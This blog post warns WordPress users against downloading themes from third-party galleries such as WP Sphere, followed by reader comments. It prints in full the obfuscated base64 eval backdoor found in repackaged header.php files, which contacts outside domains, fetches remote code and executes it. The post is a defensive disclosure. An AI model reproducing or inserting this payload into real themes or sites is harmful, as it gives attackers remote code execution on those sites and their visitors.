Do not download WordPress themes distributed by 3rd party sites

Warning for new and existing WordPress users: DO NOT download WordPress themes from 3rd party "galleries". Identify the original source of the theme and download directly from the authors website.

As WordPress – both hosted and self-hosted – continues to enjoy explosive growth, exposure to malicious activity and code will increase. Sadly, this applies to both website administrators and visitors. In August I was disappointed to discover that WordPress and Joomla themes were being redistributed with malicious code; code which would track your own visitors or allow for random ads to be served. Since being exposed, the offending website has been taken down. Unfortunately, similar theme galleries have appeared with the same intent to redistribute themes with malicious code.

WP Sphere is distributed WordPress themes with malicious code

Alistair recently tipped me off to another WordPress gallery distributing themes which include malicious code / modifications. The tip from Alistair actually began as a support email:

I have one question about the encoded stuff I saw in the header, [...]

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
@eval(@base64_decode('aWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3Q\
jY3MzVBQkMzMDkxNiA9IEBmc29ja29wZW4oInd3dy53cHNzci5jb20i\
LCA4MCwgJFIzMkQwMDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiw\
gJFI1RjUyNUY1QjM5OERBREQ3Q0YwNzg0QkQ0MDYyOThFMywgMykpICR\
SNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3Bzc3I\
iOyBlbHNlaWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMD\
kxNiA9IEBmc29ja29wZW4oInd3dy53cHNuYy5jb20iLCA4MCwgJFIzMk\
QwMDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiwgJFI1RjUyNUY1Qj\
M5OERBREQ3Q0YwNzg0QkQ0MDYyOThFMywgMykpICRSNTBGNUY5QzgwRj\
EyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3BzbmMiOyBlbHNlICRSNT\
BGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3BzbmMyIj\
sgQGV2YWwoJyRSMTRBRjFCRTlFRTI2QTkwOTIxRTY0QTgyRTc4MzY3OT\
cgPSAxOycpOyBpZigkUjE0QUYxQkU5RUUyNkE5MDkyMUU2NEE4MkU3OD\
M2Nzk3IEFORCBpbmlfZ2V0KCdhbGxvd191cmxfZm9wZW4nKSkgeyAgJF\
JEM0ZFOUMxMEE4MDhBNTRFQTJBM0RCRDlFNjA1QjY5NiA9ICIxIjsgIC\
RSNkU0RjE0QjMzNTI0M0JFNjU2QzY1RTNFRDlFMUIxMTUgPSAiaHR0cD\
ovL3d3dy4kUjUwRjVGOUM4MEYxMkZGQUU4QjI0MDA1MjhFODFCMzRFLm\
NvbS93JFJEM0ZFOUMxMEE4MDhBNTRFQTJBM0RCRDlFNjA1QjY5Ni5waH\
A/dXJsPSIuIHVybGVuY29kZSgkX1NFUlZFUlsnUkVRVUVTVF9VUkknXS\
kgLiImIi4gImhvc3Q9Ii4gdXJsZW5jb2RlKCRfU0VSVkVSWydIVFRQX0\
hPU1QnXSk7ICAkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRT\
kwID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCRSNkU0RjE0QjMzNTI0M0JFNj\
U2QzY1RTNFRDlFMUIxMTUpOyAgQGV2YWwoJFIzRTMzRTAxN0NENzZCOU\
I3RTZDNzM2NEZCOTFFMkU5MCk7IH0gZWxzZSB7ICAkUkQzRkU5QzEwQT\
gwOEE1NEVBMkEzREJEOUU2MDVCNjk2ID0gIjAiOyAgJFI2RTRGMTRCMz\
M1MjQzQkU2NTZDNjVFM0VEOUUxQjExNSA9ICJodHRwOi8vd3d3LiRSNT\
BGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUuY29tL3ckUkQzRk\
U5QzEwQTgwOEE1NEVBMkEzREJEOUU2MDVCNjk2LnBocD91cmw9Ii4gdX\
JsZW5jb2RlKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddKSAuIiYiLiAiaG\
9zdD0iLiB1cmxlbmNvZGUoJF9TRVJWRVJbJ0hUVFBfSE9TVCddKTsgIE\
ByZWFkZmlsZSgkUjZFNEYxNEIzMzUyNDNCRTY1NkM2NUUzRUQ5RTFCMT\
E1KTsgfSBmY2xvc2UoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQk\
MzMDkxNik7'));

After kindly informing Alistair that my theme(s) were not distributed with any code outside of the WordPress scope, I discovered that the code in question was downloaded from WP Sphere. Poking through some of the other recognized themes on the site, I discovered that each of the themes made available for download had been repackaged to include the code above – often in plain view within the header.php file. Paul Carroll took the time to break down what the code above exposes users to.

I think the potential for abuse of this script is huge. I see it as a covert channel to setup Word Press enabled sites as thin zombies. The code being sent back to the server and eval’d could be a mailing script for spam or phishing.

If you have downloaded themes from WP Sphere or any other WordPress themes gallery, exercise caution and inspect the source code. If you are not code proficient, identify the original author and download the theme directly.

How do you police a non-policed platform?

The growth of a platform increases the virtual bulls-eye for malicious individuals to target. How do you protect WordPress users from download sites like WP Sphere or Template Browser? Alistair pointed out that WP Sphere was targeting users by purchasing Google AdWords to strengthen and increase the likelihood of attracting organic search engine traffic. How do you fight against such websites?

Only download 5ThirtyOne themes from 5thirtyone.com

I invite WordPress theme authors to make the same recommendation for their visitors – do not download themes from websites other than your own. Additionally, if you are a theme author and discover work being redistributed [without permission] with or without malicious code, contact the offending website host to request that content be taken down.

Unless a 5ThirtyOne theme was officially converted for use on a blogging platform other than WordPress, please download themes from nowhere else other than the links below:

If you’ve recommended WordPress to friends and family, please take the time to check or inform them of the dangers of downloading from free theme galleries. [Digg this]

Discuss - 68 Comments

  1. [...] 5thirtyone.com talks about care in downloading themes, explaining how one was hacked. Digging into the malicious code chunk myself, I found that the code goes out and loads a file from one of three sites (logging the visit as well, by the way). Once loaded, the code can be either displayed on the blog, or actually executed. [...]

  2. [...] in the default RSS feed on the WP admin page of almost every WordPress-driven site) and found this post from an open-source theme developer. It seems that some of his themes had been swallowed up by a [...]

  3. [...] a fellow WordPress blogger Mike sent me an article that was written by 5thirtyone which reminds users that you have to be careful where you download your WordPress themes from. I [...]

  4. Ace says:

    Well , its true that the wordpress theme making community is getting bigger and bigger and anything that is growing such rapidly its going to have its flaws. The main reason behind these encrypted code is because of theme sponsoring. Sponsoring?? , well as a wp theme designer my self , ive had a few sponsors my self, for my wordpress themes.

    Many designers make wordpress themes just to get sponsors , ive seen many people making only one theme , changing the colors and the header making it a new theme ( so they say ) and get sponsors , the average sponsor link is worth $30-40 and a sponsored theme has 3-4 such links making a revenue of average 150$ / theme .

    So i havnt explained the reason , well the 2 main conditions that are required for a theme to be sponsored by a sponsor are

    1: Encrypted footers
    2: Heavy promotion

    Encripted footers:
    As you may or i must say definitely have read this informative article , most of new wordpress themes contain such encrypted code. Whats behind them is links, yes in most cases and i am not justifying the acts of people who have done things in the above articles, but am saying that in this encrypted code are hidden sponsored links which the sponsors have paid for. So why do people encrypt the footers? well if you see some one honest using a free theme they dont remove the footer link as they know its someones hard work , but most of the people remove the links in the footer taking the credit them selves. So in a nut shell its basically done for sponsoring.

    And as said in the article , you should download themes from sites of the theme makers or atleast download from a reputable themes gallery.

    Have a nice day .
    Ace.

  5. Thank God, I found this article! Few days back, when I was trying to modify one of my blog’s theme footer (I had to add sitemeter code next to the footer links), I saw such kind of codes. Initially I could not understand anything from that code and hence thought of removing that suspicious long code from the footer.php. But surprisingly my blog went down and it did not open. It was displaying a notice “Theme Error”.

    I could not dare to take any chance. So, I restored the footer.php from the backup via FTP client. And then everything started working normally. After that I simply changed that theme and now using another one.

    Also, I have seen few themes with malicious iframe links in the footer. So, it’s a wise idea to check theme files manually before using.

    • Derek says:

      I know this tip isn’t always ideal for a lot of the bloggers out there, but it’s always a good idea to run anything locally in a test environment before uploading to a live site.

  6. [...] Do not download WordPress themes distributed by 3rd party sites – 5thirtyone.com [...]

  7. Hugh says:

    Yes, I found this out through an article at Theme Labs – they went over the same ground, but also referred to a useful plugin which checks the authenticty of themes and identifies whether and where such malicious code exists.

    It’s a well handy plugin: TAC from http://builtbackwards.com/projects/tac/